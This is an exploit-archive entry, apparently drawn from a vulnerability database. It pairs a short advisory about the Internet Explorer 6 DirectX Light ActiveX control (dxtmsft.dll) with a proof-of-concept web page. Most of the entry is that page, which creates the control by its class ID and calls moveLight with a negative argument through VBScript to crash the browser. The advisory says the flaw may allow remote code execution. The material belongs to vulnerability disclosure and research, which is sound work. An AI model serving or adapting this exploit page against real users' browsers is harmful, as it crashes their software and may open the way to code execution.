source: https://www.securityfocus.com/bid/18303/info
The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution.
An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.
<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll
Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)
Description:
Sub moveLight (
ByVal lightNum As Long ,
ByVal x As Long ,
ByVal y As Long ,
ByVal z As Long ,
ByVal fAbsolute As Long
)
Supplying negative parameters throws an access violation.
-->
<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
Unable to create object
</object>
<script language="vbscript">
Sub go
DXTLight.moveLight "-1", "1", "1", "1", "1"
End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">
